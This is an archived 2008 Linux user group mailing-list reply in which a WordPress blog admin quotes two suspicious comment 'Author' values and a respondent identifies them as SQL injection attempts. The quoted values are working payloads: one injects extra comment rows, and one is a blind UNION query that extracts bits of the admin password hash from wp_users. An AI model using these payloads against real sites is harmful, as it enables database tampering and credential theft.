[Gllug] What wordpress vuln / tool is this?
Progga
proggaprogga at gmail.com
Sat Mar 8 22:24:58 UTC 2008
On Sat, Mar 08, 2008 at 09:06:23PM +0000, Richard Jones wrote:
> Somebody attempted to post two comments in quick succession to a
> Wordpress blog I manage. These were the 'Author' fields which caught
> my eye. Does anyone know what vulnerability they are attempting to
> exploit and/or if they are using some particular tool? (The IP
> addresses are bogus - it's behind a proxy).
>
> Author : Bill42046771','766028332billy at msn.com','','84.56.135.100','2008-03-08 14:50:45','2008-03-08 14:50:45','','0','lynx','comment','0','0'),('0', '', '', '', '', '2008-03-09 14:50:45', '2008-03-09 14:50:45', '', 'spam', '', 'comment', '0','0' ) /* (IP: 10.0.0.135 , 10.0.0.135)
>
> Author : ' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' and substring(reverse(lpad(conv(substring(user_pass,19,1), 16, 2),4,'0')),3,1)='1' /* (IP: 10.0.0.135 , 10.0.0.135)
You mean the issue number of the SQL injection hole that Bill is trying to
exploit?
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 194 bytes
Desc: not available
URL: <http://mailman.lug.org.uk/pipermail/gllug/attachments/20080308/47286fe4/attachment.pgp>
-------------- next part --------------
--
Gllug mailing list - Gllug at gllug.org.uk
http://lists.gllug.org.uk/mailman/listinfo/gllug
More information about the GLLUG
mailing list